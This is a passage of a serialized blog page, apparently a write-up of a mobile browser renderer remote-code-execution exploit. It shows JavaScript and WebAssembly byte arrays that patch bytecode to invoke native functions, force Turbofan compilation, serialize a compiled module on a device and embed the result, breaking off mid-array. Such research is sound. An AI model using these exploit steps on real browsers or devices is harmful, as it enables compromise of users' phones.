a16;\n}\n",[135807],{"type":28,"tag":98,"props":135808,"children":135809},{"__ignoreMap":7},[135810,135821,135865,135885,135901,135924,135951,135966],{"type":28,"tag":116,"props":135811,"children":135812},{"class":245,"line":246},[135813,135817],{"type":28,"tag":116,"props":135814,"children":135815},{"style":260},[135816],{"type":33,"value":47955},{"type":28,"tag":116,"props":135818,"children":135819},{"style":266},[135820],{"type":33,"value":1291},{"type":28,"tag":116,"props":135822,"children":135823},{"class":245,"line":256},[135824,135828,135832,135836,135840,135844,135848,135853,135857,135861],{"type":28,"tag":116,"props":135825,"children":135826},{"style":272},[135827],{"type":33,"value":132808},{"type":28,"tag":116,"props":135829,"children":135830},{"style":266},[135831],{"type":33,"value":76238},{"type":28,"tag":116,"props":135833,"children":135834},{"style":563},[135835],{"type":33,"value":132817},{"type":28,"tag":116,"props":135837,"children":135838},{"style":266},[135839],{"type":33,"value":141},{"type":28,"tag":116,"props":135841,"children":135842},{"style":282},[135843],{"type":33,"value":132826},{"type":28,"tag":116,"props":135845,"children":135846},{"style":266},[135847],{"type":33,"value":313},{"type":28,"tag":116,"props":135849,"children":135850},{"style":350},[135851],{"type":33,"value":135852},"0x059301",{"type":28,"tag":116,"props":135854,"children":135855},{"style":370},[135856],{"type":33,"value":50874},{"type":28,"tag":116,"props":135858,"children":135859},{"style":350},[135860],{"type":33,"value":4192},{"type":28,"tag":116,"props":135862,"children":135863},{"style":266},[135864],{"type":33,"value":132848},{"type":28,"tag":116,"props":135866,"children":135867},{"class":245,"line":293},[135868,135872,135876,135881],{"type":28,"tag":116,"props":135869,"children":135870},{"style":272},[135871],{"type":33,"value":132856},{"type":28,"tag":116,"props":135873,"children":135874},{"style":370},[135875],{"type":33,"value":2258},{"type":28,"tag":116,"props":135877,"children":135878},{"style":350},[135879],{"type":33,"value":135880}," 0x03027a6c",{"type":28,"tag":116,"props":135882,"children":135883},{"style":266},[135884],{"type":33,"value":384},{"type":28,"tag":116,"props":135886,"children":135887},{"class":245,"line":361},[135888,135892,135897],{"type":28,"tag":116,"props":135889,"children":135890},{"style":260},[135891],{"type":33,"value":34828},{"type":28,"tag":116,"props":135893,"children":135894},{"style":350},[135895],{"type":33,"value":135896}," 0x393e71a",{"type":28,"tag":116,"props":135898,"children":135899},{"style":266},[135900],{"type":33,"value":384},{"type":28,"tag":116,"props":135902,"children":135903},{"class":245,"line":387},[135904,135908,135912,135916,135920],{"type":28,"tag":116,"props":135905,"children":135906},{"style":266},[135907],{"type":33,"value":46499},{"type":28,"tag":116,"props":135909,"children":135910},{"style":260},[135911],{"type":33,"value":48033},{"type":28,"tag":116,"props":135913,"children":135914},{"style":266},[135915],{"type":33,"value":269},{"type":28,"tag":116,"props":135917,"children":135918},{"style":272},[135919],{"type":33,"value":1413},{"type":28,"tag":116,"props":135921,"children":135922},{"style":266},[135923],{"type":33,"value":844},{"type":28,"tag":116,"props":135925,"children":135926},{"class":245,"line":400},[135927,135931,135935,135939,135943,135947],{"type":28,"tag":116,"props":135928,"children":135929},{"style":272},[135930],{"type":33,"value":101558},{"type":28,"tag":116,"props":135932,"children":135933},{"style":266},[135934],{"type":33,"value":141},{"type":28,"tag":116,"props":135936,"children":135937},{"style":282},[135938],{"type":33,"value":101567},{"type":28,"tag":116,"props":135940,"children":135941},{"style":266},[135942],{"type":33,"value":313},{"type":28,"tag":116,"props":135944,"children":135945},{"style":563},[135946],{"type":33,"value":132932},{"type":28,"tag":116,"props":135948,"children":135949},{"style":266},[135950],{"type":33,"value":895},{"type":28,"tag":116,"props":135952,"children":135953},{"class":245,"line":614},[135954,135958,135962],{"type":28,"tag":116,"props":135955,"children":135956},{"style":260},[135957],{"type":33,"value":132944},{"type":28,"tag":116,"props":135959,"children":135960},{"style":272},[135961],{"type":33,"value":132949},{"type":28,"tag":116,"props":135963,"children":135964},{"style":266},[135965],{"type":33,"value":384},{"type":28,"tag":116,"props":135967,"children":135968},{"class":245,"line":631},[135969],{"type":28,"tag":116,"props":135970,"children":135971},{"style":266},[135972],{"type":33,"value":406},{"type":28,"tag":29,"props":135974,"children":135975},{},[135976,135978,135984,135986,135992,135994,136000,136002,136007,136009,136015,136017,136022,136023,136029],{"type":33,"value":135977},"Here, ",{"type":28,"tag":98,"props":135979,"children":135981},{"className":135980},[],[135982],{"type":33,"value":135983},"a1 + 0x03027a6c",{"type":33,"value":135985}," generates the bytes ",{"type":28,"tag":98,"props":135987,"children":135989},{"className":135988},[],[135990],{"type":33,"value":135991},"01 4b 6c 7a 02 03",{"type":33,"value":135993},", where ",{"type":28,"tag":98,"props":135995,"children":135997},{"className":135996},[],[135998],{"type":33,"value":135999},"0x6c",{"type":33,"value":136001}," is the ",{"type":28,"tag":98,"props":136003,"children":136005},{"className":136004},[],[136006],{"type":33,"value":132525},{"type":33,"value":136008}," opcode, ",{"type":28,"tag":98,"props":136010,"children":136012},{"className":136011},[],[136013],{"type":33,"value":136014},"0x027a",{"type":33,"value":136016}," is the function ID of ",{"type":28,"tag":98,"props":136018,"children":136020},{"className":136019},[],[136021],{"type":33,"value":132567},{"type":33,"value":6159},{"type":28,"tag":98,"props":136024,"children":136026},{"className":136025},[],[136027],{"type":33,"value":136028},"0x03",{"type":33,"value":136030}," is the register index holding its first argument.",{"type":28,"tag":29,"props":136032,"children":136033},{},[136034,136036,136041,136042,136047,136049,136054],{"type":33,"value":136035},"Our earlier javascript snippet that serialized the wasm module used two native calls: ",{"type":28,"tag":98,"props":136037,"children":136039},{"className":136038},[],[136040],{"type":33,"value":132567},{"type":33,"value":10659},{"type":28,"tag":98,"props":136043,"children":136045},{"className":136044},[],[136046],{"type":33,"value":133535},{"type":33,"value":136048},". To avoid patching the bytecode again to invoke ",{"type":28,"tag":98,"props":136050,"children":136052},{"className":136051},[],[136053],{"type":33,"value":133535},{"type":33,"value":136055},", we can force Turbofan to compile the target function like this:",{"type":28,"tag":234,"props":136057,"children":136059},{"code":136058,"language":35241,"meta":7,"className":35239,"style":7},"// %WasmTierUpFunction(func);\nfor (let i = 0; i \u003C 0x100000; i++) {\n  func();\n}\n",[136060],{"type":28,"tag":98,"props":136061,"children":136062},{"__ignoreMap":7},[136063,136071,136131,136143],{"type":28,"tag":116,"props":136064,"children":136065},{"class":245,"line":246},[136066],{"type":28,"tag":116,"props":136067,"children":136068},{"style":250},[136069],{"type":33,"value":136070},"// %WasmTierUpFunction(func);\n",{"type":28,"tag":116,"props":136072,"children":136073},{"class":245,"line":256},[136074,136078,136082,136086,136090,136094,136098,136102,136106,136110,136115,136119,136123,136127],{"type":28,"tag":116,"props":136075,"children":136076},{"style":260},[136077],{"type":33,"value":3063},{"type":28,"tag":116,"props":136079,"children":136080},{"style":266},[136081],{"type":33,"value":269},{"type":28,"tag":116,"props":136083,"children":136084},{"style":376},[136085],{"type":33,"value":11455},{"type":28,"tag":116,"props":136087,"children":136088},{"style":272},[136089],{"type":33,"value":3068},{"type":28,"tag":116,"props":136091,"children":136092},{"style":370},[136093],{"type":33,"value":2226},{"type":28,"tag":116,"props":136095,"children":136096},{"style":350},[136097],{"type":33,"value":2718},{"type":28,"tag":116,"props":136099,"children":136100},{"style":266},[136101],{"type":33,"value":16888},{"type":28,"tag":116,"props":136103,"children":136104},{"style":272},[136105],{"type":33,"value":3408},{"type":28,"tag":116,"props":136107,"children":136108},{"style":370},[136109],{"type":33,"value":8391},{"type":28,"tag":116,"props":136111,"children":136112},{"style":350},[136113],{"type":33,"value":136114}," 0x100000",{"type":28,"tag":116,"props":136116,"children":136117},{"style":266},[136118],{"type":33,"value":16888},{"type":28,"tag":116,"props":136120,"children":136121},{"style":272},[136122],{"type":33,"value":3408},{"type":28,"tag":116,"props":136124,"children":136125},{"style":370},[136126],{"type":33,"value":50888},{"type":28,"tag":116,"props":136128,"children":136129},{"style":266},[136130],{"type":33,"value":844},{"type":28,"tag":116,"props":136132,"children":136133},{"class":245,"line":293},[136134,136139],{"type":28,"tag":116,"props":136135,"children":136136},{"style":282},[136137],{"type":33,"value":136138},"  func",{"type":28,"tag":116,"props":136140,"children":136141},{"style":266},[136142],{"type":33,"value":1445},{"type":28,"tag":116,"props":136144,"children":136145},{"class":245,"line":361},[136146],{"type":28,"tag":116,"props":136147,"children":136148},{"style":266},[136149],{"type":33,"value":406},{"type":28,"tag":29,"props":136151,"children":136152},{},[136153],{"type":33,"value":136154},"Finally, running this code on the device:",{"type":28,"tag":234,"props":136156,"children":136158},{"code":136157,"language":35241,"meta":7,"className":35239,"style":7},"(async () => {\n  var wasm_code = new Uint8Array([\n    0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n    0, 0, 10, 4, 1, 2, 0, 11,\n  ]);\n  var mod = new WebAssembly.Module(wasm_code);\n  var inst = new WebAssembly.Instance(mod);\n  var func = inst.exports.shell;\n\n  // %WasmTierUpFunction(func);\n  for (let i = 0; i \u003C 0x100000; i++) {\n    func();\n  }\n\n  let r = bug(mod);\n  result = (await r.next()).value;\n  console.log(result);\n\n  let result_bytes = new Uint8Array(result);\n  console.log('[' + result_bytes.join(', ') + ']');\n})();\n",[136159],{"type":28,"tag":98,"props":136160,"children":136161},{"__ignoreMap":7},[136162,136185,136213,136432,136499,136506,136549,136592,136631,136638,136646,136706,136718,136725,136732,136763,136806,136833,136840,136876,136939],{"type":28,"tag":116,"props":136163,"children":136164},{"class":245,"line":246},[136165,136169,136173,136177,136181],{"type":28,"tag":116,"props":136166,"children":136167},{"style":266},[136168],{"type":33,"value":313},{"type":28,"tag":116,"props":136170,"children":136171},{"style":376},[136172],{"type":33,"value":35771},{"type":28,"tag":116,"props":136174,"children":136175},{"style":266},[136176],{"type":33,"value":39316},{"type":28,"tag":116,"props":136178,"children":136179},{"style":376},[136180],{"type":33,"value":1286},{"type":28,"tag":116,"props":136182,"children":136183},{"style":266},[136184],{"type":33,"value":1291},{"type":28,"tag":116,"props":136186,"children":136187},{"class":245,"line":256},[136188,136193,136197,136201,136205,136209],{"type":28,"tag":116,"props":136189,"children":136190},{"style":376},[136191],{"type":33,"value":136192},"  var",{"type":28,"tag":116,"props":136194,"children":136195},{"style":272},[136196],{"type":33,"value":133065},{"type":28,"tag":116,"props":136198,"children":136199},{"style":370},[136200],{"type":33,"value":2226},{"type":28,"tag":116,"props":136202,"children":136203},{"style":376},[136204],{"type":33,"value":31582},{"type":28,"tag":116,"props":136206,"children":136207},{"style":282},[136208],{"type":33,"value":133078},{"type":28,"tag":116,"props":136210,"children":136211},{"style":266},[136212],{"type":33,"value":133083},{"type":28,"tag":116,"props":136214,"children":136215},{"class":245,"line":293},[136216,136220,136224,136228,136232,136236,136240,136244,136248,136252,136256,136260,136264,136268,136272,136276,136280,136284,136288,136292,136296,136300,136304,136308,136312,136316,136320,136324,136328,136332,136336,136340,136344,136348,136352,136356,136360,136364,136368,136372,136376,136380,136384,136388,136392,136396,136400,136404,136408,136412,136416,136420,136424,136428],{"type":28,"tag":116,"props":136217,"children":136218},{"style":350},[136219],{"type":33,"value":133808},{"type":28,"tag":116,"props":136221,"children":136222},{"style":266},[136223],{"type":33,"value":825},{"type":28,"tag":116,"props":136225,"children":136226},{"style":350},[136227],{"type":33,"value":133100},{"type":28,"tag":116,"props":136229,"children":136230},{"style":266},[136231],{"type":33,"value":825},{"type":28,"tag":116,"props":136233,"children":136234},{"style":350},[136235],{"type":33,"value":133109},{"type":28,"tag":116,"props":136237,"children":136238},{"style":266},[136239],{"type":33,"value":825},{"type":28,"tag":116,"props":136241,"children":136242},{"style":350},[136243],{"type":33,"value":133118},{"type":28,"tag":116,"props":136245,"children":136246},{"style":266},[136247],{"type":33,"value":825},{"type":28,"tag":116,"props":136249,"children":136250},{"style":350},[136251],{"type":33,"value":1824},{"type":28,"tag":116,"props":136253,"children":136254},{"style":266},[136255],{"type":33,"value":825},{"type":28,"tag":116,"props":136257,"children":136258},{"style":350},[136259],{"type":33,"value":353},{"type":28,"tag":116,"props":136261,"children":136262},{"style":266},[136263],{"type":33,"value":825},{"type":28,"tag":116,"props":136265,"children":136266},{"style":350},[136267],{"type":33,"value":353},{"type":28,"tag":116,"props":136269,"children":136270},{"style":266},[136271],{"type":33,"value":825},{"type":28,"tag":116,"props":136273,"children":136274},{"style":350},[136275],{"type":33,"value":353},{"type":28,"tag":116,"props":136277,"children":136278},{"style":266},[136279],{"type":33,"value":825},{"type":28,"tag":116,"props":136281,"children":136282},{"style":350},[136283],{"type":33,"value":1824},{"type":28,"tag":116,"props":136285,"children":136286},{"style":266},[136287],{"type":33,"value":825},{"type":28,"tag":116,"props":136289,"children":136290},{"style":350},[136291],{"type":33,"value":17190},{"type":28,"tag":116,"props":136293,"children":136294},{"style":266},[136295],{"type":33,"value":825},{"type":28,"tag":116,"props":136297,"children":136298},{"style":350},[136299],{"type":33,"value":1824},{"type":28,"tag":116,"props":136301,"children":136302},{"style":266},[136303],{"type":33,"value":825},{"type":28,"tag":116,"props":136305,"children":136306},{"style":350},[136307],{"type":33,"value":133183},{"type":28,"tag":116,"props":136309,"children":136310},{"style":266},[136311],{"type":33,"value":825},{"type":28,"tag":116,"props":136313,"children":136314},{"style":350},[136315],{"type":33,"value":353},{"type":28,"tag":116,"props":136317,"children":136318},{"style":266},[136319],{"type":33,"value":825},{"type":28,"tag":116,"props":136321,"children":136322},{"style":350},[136323],{"type":33,"value":353},{"type":28,"tag":116,"props":136325,"children":136326},{"style":266},[136327],{"type":33,"value":825},{"type":28,"tag":116,"props":136329,"children":136330},{"style":350},[136331],{"type":33,"value":16957},{"type":28,"tag":116,"props":136333,"children":136334},{"style":266},[136335],{"type":33,"value":825},{"type":28,"tag":116,"props":136337,"children":136338},{"style":350},[136339],{"type":33,"value":2794},{"type":28,"tag":116,"props":136341,"children":136342},{"style":266},[136343],{"type":33,"value":825},{"type":28,"tag":116,"props":136345,"children":136346},{"style":350},[136347],{"type":33,"value":1824},{"type":28,"tag":116,"props":136349,"children":136350},{"style":266},[136351],{"type":33,"value":825},{"type":28,"tag":116,"props":136353,"children":136354},{"style":350},[136355],{"type":33,"value":353},{"type":28,"tag":116,"props":136357,"children":136358},{"style":266},[136359],{"type":33,"value":825},{"type":28,"tag":116,"props":136361,"children":136362},{"style":350},[136363],{"type":33,"value":54289},{"type":28,"tag":116,"props":136365,"children":136366},{"style":266},[136367],{"type":33,"value":825},{"type":28,"tag":116,"props":136369,"children":136370},{"style":350},[136371],{"type":33,"value":55504},{"type":28,"tag":116,"props":136373,"children":136374},{"style":266},[136375],{"type":33,"value":825},{"type":28,"tag":116,"props":136377,"children":136378},{"style":350},[136379],{"type":33,"value":1824},{"type":28,"tag":116,"props":136381,"children":136382},{"style":266},[136383],{"type":33,"value":825},{"type":28,"tag":116,"props":136385,"children":136386},{"style":350},[136387],{"type":33,"value":17771},{"type":28,"tag":116,"props":136389,"children":136390},{"style":266},[136391],{"type":33,"value":825},{"type":28,"tag":116,"props":136393,"children":136394},{"style":350},[136395],{"type":33,"value":133109},{"type":28,"tag":116,"props":136397,"children":136398},{"style":266},[136399],{"type":33,"value":825},{"type":28,"tag":116,"props":136401,"children":136402},{"style":350},[136403],{"type":33,"value":133280},{"type":28,"tag":116,"props":136405,"children":136406},{"style":266},[136407],{"type":33,"value":825},{"type":28,"tag":116,"props":136409,"children":136410},{"style":350},[136411],{"type":33,"value":133289},{"type":28,"tag":116,"props":136413,"children":136414},{"style":266},[136415],{"type":33,"value":825},{"type":28,"tag":116,"props":136417,"children":136418},{"style":350},[136419],{"type":33,"value":133298},{"type":28,"tag":116,"props":136421,"children":136422},{"style":266},[136423],{"type":33,"value":825},{"type":28,"tag":116,"props":136425,"children":136426},{"style":350},[136427],{"type":33,"value":133298},{"type":28,"tag":116,"props":136429,"children":136430},{"style":266},[136431],{"type":33,"value":3178},{"type":28,"tag":116,"props":136433,"children":136434},{"class":245,"line":361},[136435,136439,136443,136447,136451,136455,136459,136463,136467,136471,136475,136479,136483,136487,136491,136495],{"type":28,"tag":116,"props":136436,"children":136437},{"style":350},[136438],{"type":33,"value":133808},{"type":28,"tag":116,"props":136440,"children":136441},{"style":266},[136442],{"type":33,"value":825},{"type":28,"tag":116,"props":136444,"children":136445},{"style":350},[136446],{"type":33,"value":353},{"type":28,"tag":116,"props":136448,"children":136449},{"style":266},[136450],{"type":33,"value":825},{"type":28,"tag":116,"props":136452,"children":136453},{"style":350},[136454],{"type":33,"value":88871},{"type":28,"tag":116,"props":136456,"children":136457},{"style":266},[136458],{"type":33,"value":825},{"type":28,"tag":116,"props":136460,"children":136461},{"style":350},[136462],{"type":33,"value":17190},{"type":28,"tag":116,"props":136464,"children":136465},{"style":266},[136466],{"type":33,"value":825},{"type":28,"tag":116,"props":136468,"children":136469},{"style":350},[136470],{"type":33,"value":1824},{"type":28,"tag":116,"props":136472,"children":136473},{"style":266},[136474],{"type":33,"value":825},{"type":28,"tag":116,"props":136476,"children":136477},{"style":350},[136478],{"type":33,"value":2794},{"type":28,"tag":116,"props":136480,"children":136481},{"style":266},[136482],{"type":33,"value":825},{"type":28,"tag":116,"props":136484,"children":136485},{"style":350},[136486],{"type":33,"value":353},{"type":28,"tag":116,"props":136488,"children":136489},{"style":266},[136490],{"type":33,"value":825},{"type":28,"tag":116,"props":136492,"children":136493},{"style":350},[136494],{"type":33,"value":133374},{"type":28,"tag":116,"props":136496,"children":136497},{"style":266},[136498],{"type":33,"value":3178},{"type":28,"tag":116,"props":136500,"children":136501},{"class":245,"line":387},[136502],{"type":28,"tag":116,"props":136503,"children":136504},{"style":266},[136505],{"type":33,"value":134095},{"type":28,"tag":116,"props":136507,"children":136508},{"class":245,"line":400},[136509,136513,136517,136521,136525,136529,136533,136537,136541,136545],{"type":28,"tag":116,"props":136510,"children":136511},{"style":376},[136512],{"type":33,"value":136192},{"type":28,"tag":116,"props":136514,"children":136515},{"style":272},[136516],{"type":33,"value":71242},{"type":28,"tag":116,"props":136518,"children":136519},{"style":370},[136520],{"type":33,"value":2226},{"type":28,"tag":116,"props":136522,"children":136523},{"style":376},[136524],{"type":33,"value":31582},{"type":28,"tag":116,"props":136526,"children":136527},{"style":272},[136528],{"type":33,"value":133409},{"type":28,"tag":116,"props":136530,"children":136531},{"style":266},[136532],{"type":33,"value":141},{"type":28,"tag":116,"props":136534,"children":136535},{"style":282},[136536],{"type":33,"value":85537},{"type":28,"tag":116,"props":136538,"children":136539},{"style":266},[136540],{"type":33,"value":313},{"type":28,"tag":116,"props":136542,"children":136543},{"style":272},[136544],{"type":33,"value":133426},{"type":28,"tag":116,"props":136546,"children":136547},{"style":266},[136548],{"type":33,"value":895},{"type":28,"tag":116,"props":136550,"children":136551},{"class":245,"line":614},[136552,136556,136560,136564,136568,136572,136576,136580,136584,136588],{"type":28,"tag":116,"props":136553,"children":136554},{"style":376},[136555],{"type":33,"value":136192},{"type":28,"tag":116,"props":136557,"children":136558},{"style":272},[136559],{"type":33,"value":133442},{"type":28,"tag":116,"props":136561,"children":136562},{"style":370},[136563],{"type":33,"value":2226},{"type":28,"tag":116,"props":136565,"children":136566},{"style":376},[136567],{"type":33,"value":31582},{"type":28,"tag":116,"props":136569,"children":136570},{"style":272},[136571],{"type":33,"value":133409},{"type":28,"tag":116,"props":136573,"children":136574},{"style":266},[136575],{"type":33,"value":141},{"type":28,"tag":116,"props":136577,"children":136578},{"style":282},[136579],{"type":33,"value":133463},{"type":28,"tag":116,"props":136581,"children":136582},{"style":266},[136583],{"type":33,"value":313},{"type":28,"tag":116,"props":136585,"children":136586},{"style":272},[136587],{"type":33,"value":133472},{"type":28,"tag":116,"props":136589,"children":136590},{"style":266},[136591],{"type":33,"value":895},{"type":28,"tag":116,"props":136593,"children":136594},{"class":245,"line":631},[136595,136599,136603,136607,136611,136615,136619,136623,136627],{"type":28,"tag":116,"props":136596,"children":136597},{"style":376},[136598],{"type":33,"value":136192},{"type":28,"tag":116,"props":136600,"children":136601},{"style":272},[136602],{"type":33,"value":79628},{"type":28,"tag":116,"props":136604,"children":136605},{"style":370},[136606],{"type":33,"value":2226},{"type":28,"tag":116,"props":136608,"children":136609},{"style":272},[136610],{"type":33,"value":133442},{"type":28,"tag":116,"props":136612,"children":136613},{"style":266},[136614],{"type":33,"value":141},{"type":28,"tag":116,"props":136616,"children":136617},{"style":272},[136618],{"type":33,"value":37509},{"type":28,"tag":116,"props":136620,"children":136621},{"style":266},[136622],{"type":33,"value":141},{"type":28,"tag":116,"props":136624,"children":136625},{"style":272},[136626],{"type":33,"value":133512},{"type":28,"tag":116,"props":136628,"children":136629},{"style":266},[136630],{"type":33,"value":384},{"type":28,"tag":116,"props":136632,"children":136633},{"class":245,"line":665},[136634],{"type":28,"tag":116,"props":136635,"children":136636},{"emptyLinePlaceholder":19},[136637],{"type":33,"value":1044},{"type":28,"tag":116,"props":136639,"children":136640},{"class":245,"line":713},[136641],{"type":28,"tag":116,"props":136642,"children":136643},{"style":250},[136644],{"type":33,"value":136645},"  // %WasmTierUpFunction(func);\n",{"type":28,"tag":116,"props":136647,"children":136648},{"class":245,"line":750},[136649,136654,136658,136662,136666,136670,136674,136678,136682,136686,136690,136694,136698,136702],{"type":28,"tag":116,"props":136650,"children":136651},{"style":260},[136652],{"type":33,"value":136653},"  for",{"type":28,"tag":116,"props":136655,"children":136656},{"style":266},[136657],{"type":33,"value":269},{"type":28,"tag":116,"props":136659,"children":136660},{"style":376},[136661],{"type":33,"value":11455},{"type":28,"tag":116,"props":136663,"children":136664},{"style":272},[136665],{"type":33,"value":3068},{"type":28,"tag":116,"props":136667,"children":136668},{"style":370},[136669],{"type":33,"value":2226},{"type":28,"tag":116,"props":136671,"children":136672},{"style":350},[136673],{"type":33,"value":2718},{"type":28,"tag":116,"props":136675,"children":136676},{"style":266},[136677],{"type":33,"value":16888},{"type":28,"tag":116,"props":136679,"children":136680},{"style":272},[136681],{"type":33,"value":3408},{"type":28,"tag":116,"props":136683,"children":136684},{"style":370},[136685],{"type":33,"value":8391},{"type":28,"tag":116,"props":136687,"children":136688},{"style":350},[136689],{"type":33,"value":136114},{"type":28,"tag":116,"props":136691,"children":136692},{"style":266},[136693],{"type":33,"value":16888},{"type":28,"tag":116,"props":136695,"children":136696},{"style":272},[136697],{"type":33,"value":3408},{"type":28,"tag":116,"props":136699,"children":136700},{"style":370},[136701],{"type":33,"value":50888},{"type":28,"tag":116,"props":136703,"children":136704},{"style":266},[136705],{"type":33,"value":844},{"type":28,"tag":116,"props":136707,"children":136708},{"class":245,"line":779},[136709,136714],{"type":28,"tag":116,"props":136710,"children":136711},{"style":282},[136712],{"type":33,"value":136713},"    func",{"type":28,"tag":116,"props":136715,"children":136716},{"style":266},[136717],{"type":33,"value":1445},{"type":28,"tag":116,"props":136719,"children":136720},{"class":245,"line":796},[136721],{"type":28,"tag":116,"props":136722,"children":136723},{"style":266},[136724],{"type":33,"value":5543},{"type":28,"tag":116,"props":136726,"children":136727},{"class":245,"line":847},[136728],{"type":28,"tag":116,"props":136729,"children":136730},{"emptyLinePlaceholder":19},[136731],{"type":33,"value":1044},{"type":28,"tag":116,"props":136733,"children":136734},{"class":245,"line":898},[136735,136739,136743,136747,136751,136755,136759],{"type":28,"tag":116,"props":136736,"children":136737},{"style":376},[136738],{"type":33,"value":7527},{"type":28,"tag":116,"props":136740,"children":136741},{"style":272},[136742],{"type":33,"value":135548},{"type":28,"tag":116,"props":136744,"children":136745},{"style":370},[136746],{"type":33,"value":2226},{"type":28,"tag":116,"props":136748,"children":136749},{"style":282},[136750],{"type":33,"value":135557},{"type":28,"tag":116,"props":136752,"children":136753},{"style":266},[136754],{"type":33,"value":313},{"type":28,"tag":116,"props":136756,"children":136757},{"style":272},[136758],{"type":33,"value":133472},{"type":28,"tag":116,"props":136760,"children":136761},{"style":266},[136762],{"type":33,"value":895},{"type":28,"tag":116,"props":136764,"children":136765},{"class":245,"line":907},[136766,136770,136774,136778,136782,136786,136790,136794,136798,136802],{"type":28,"tag":116,"props":136767,"children":136768},{"style":272},[136769],{"type":33,"value":135593},{"type":28,"tag":116,"props":136771,"children":136772},{"style":370},[136773],{"type":33,"value":2226},{"type":28,"tag":116,"props":136775,"children":136776},{"style":266},[136777],{"type":33,"value":269},{"type":28,"tag":116,"props":136779,"children":136780},{"style":260},[136781],{"type":33,"value":1091},{"type":28,"tag":116,"props":136783,"children":136784},{"style":272},[136785],{"type":33,"value":135548},{"type":28,"tag":116,"props":136787,"children":136788},{"style":266},[136789],{"type":33,"value":141},{"type":28,"tag":116,"props":136791,"children":136792},{"style":282},[136793],{"type":33,"value":57184},{"type":28,"tag":116,"props":136795,"children":136796},{"style":266},[136797],{"type":33,"value":135622},{"type":28,"tag":116,"props":136799,"children":136800},{"style":272},[136801],{"type":33,"value":38773},{"type":28,"tag":116,"props":136803,"children":136804},{"style":266},[136805],{"type":33,"value":384},{"type":28,"tag":116,"props":136807,"children":136808},{"class":245,"line":981},[136809,136813,136817,136821,136825,136829],{"type":28,"tag":116,"props":136810,"children":136811},{"style":272},[136812],{"type":33,"value":101558},{"type":28,"tag":116,"props":136814,"children":136815},{"style":266},[136816],{"type":33,"value":141},{"type":28,"tag":116,"props":136818,"children":136819},{"style":282},[136820],{"type":33,"value":101567},{"type":28,"tag":116,"props":136822,"children":136823},{"style":266},[136824],{"type":33,"value":313},{"type":28,"tag":116,"props":136826,"children":136827},{"style":272},[136828],{"type":33,"value":8751},{"type":28,"tag":116,"props":136830,"children":136831},{"style":266},[136832],{"type":33,"value":895},{"type":28,"tag":116,"props":136834,"children":136835},{"class":245,"line":1011},[136836],{"type":28,"tag":116,"props":136837,"children":136838},{"emptyLinePlaceholder":19},[136839],{"type":33,"value":1044},{"type":28,"tag":116,"props":136841,"children":136842},{"class":245,"line":1029},[136843,136847,136852,136856,136860,136864,136868,136872],{"type":28,"tag":116,"props":136844,"children":136845},{"style":376},[136846],{"type":33,"value":7527},{"type":28,"tag":116,"props":136848,"children":136849},{"style":272},[136850],{"type":33,"value":136851}," result_bytes",{"type":28,"tag":116,"props":136853,"children":136854},{"style":370},[136855],{"type":33,"value":2226},{"type":28,"tag":116,"props":136857,"children":136858},{"style":376},[136859],{"type":33,"value":31582},{"type":28,"tag":116,"props":136861,"children":136862},{"style":282},[136863],{"type":33,"value":133078},{"type":28,"tag":116,"props":136865,"children":136866},{"style":266},[136867],{"type":33,"value":313},{"type":28,"tag":116,"props":136869,"children":136870},{"style":272},[136871],{"type":33,"value":8751},{"type":28,"tag":116,"props":136873,"children":136874},{"style":266},[136875],{"type":33,"value":895},{"type":28,"tag":116,"props":136877,"children":136878},{"class":245,"line":1038},[136879,136883,136887,136891,136895,136899,136903,136907,136911,136915,136919,136923,136927,136931,136935],{"type":28,"tag":116,"props":136880,"children":136881},{"style":272},[136882],{"type":33,"value":101558},{"type":28,"tag":116,"props":136884,"children":136885},{"style":266},[136886],{"type":33,"value":141},{"type":28,"tag":116,"props":136888,"children":136889},{"style":282},[136890],{"type":33,"value":101567},{"type":28,"tag":116,"props":136892,"children":136893},{"style":266},[136894],{"type":33,"value":313},{"type":28,"tag":116,"props":136896,"children":136897},{"style":563},[136898],{"type":33,"value":133645},{"type":28,"tag":116,"props":136900,"children":136901},{"style":370},[136902],{"type":33,"value":2258},{"type":28,"tag":116,"props":136904,"children":136905},{"style":272},[136906],{"type":33,"value":136851},{"type":28,"tag":116,"props":136908,"children":136909},{"style":266},[136910],{"type":33,"value":141},{"type":28,"tag":116,"props":136912,"children":136913},{"style":282},[136914],{"type":33,"value":133662},{"type":28,"tag":116,"props":136916,"children":136917},{"style":266},[136918],{"type":33,"value":313},{"type":28,"tag":116,"props":136920,"children":136921},{"style":563},[136922],{"type":33,"value":133671},{"type":28,"tag":116,"props":136924,"children":136925},{"style":266},[136926],{"type":33,"value":1609},{"type":28,"tag":116,"props":136928,"children":136929},{"style":370},[136930],{"type":33,"value":2268},{"type":28,"tag":116,"props":136932,"children":136933},{"style":563},[136934],{"type":33,"value":133684},{"type":28,"tag":116,"props":136936,"children":136937},{"style":266},[136938],{"type":33,"value":895},{"type":28,"tag":116,"props":136940,"children":136941},{"class":245,"line":1047},[136942],{"type":28,"tag":116,"props":136943,"children":136944},{"style":266},[136945],{"type":33,"value":101599},{"type":28,"tag":29,"props":136947,"children":136948},{},[136949],{"type":33,"value":136950},"We get the serialized bytes:",{"type":28,"tag":29,"props":136952,"children":136953},{},[136954],{"type":28,"tag":206,"props":136955,"children":136958},{"alt":136956,"src":136957},"image2","/posts/mobile-renderer-rce/image2.png",[],{"type":28,"tag":29,"props":136960,"children":136961},{},[136962,136964,136969],{"type":33,"value":136963},"We can now embed this output into the original bytecode that calls ",{"type":28,"tag":98,"props":136965,"children":136967},{"className":136966},[],[136968],{"type":33,"value":132541},{"type":33,"value":4160},{"type":28,"tag":234,"props":136971,"children":136973},{"code":136972,"language":35241,"meta":7,"className":35239,"style":7},"(async () => {\n  const wasm_code = new Uint8Array([\n    0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108,\n    0, 0, 10, 4, 1, 2, 0, 11,\n  ]);\n  const buffer = new Uint8Array([\n    146, 6, 222, 192, 174, 122, 171, 151, 31, 0, 0, 0, 39, 61, 60, 31, 0, 16, 3, 0, 0, 0, 0, 0, 64,\n    0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 56, 0, 0, 0, 44, 0, 0, 0, 56, 0, 0, 0, 56, 0,\n    0, 0, 56, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 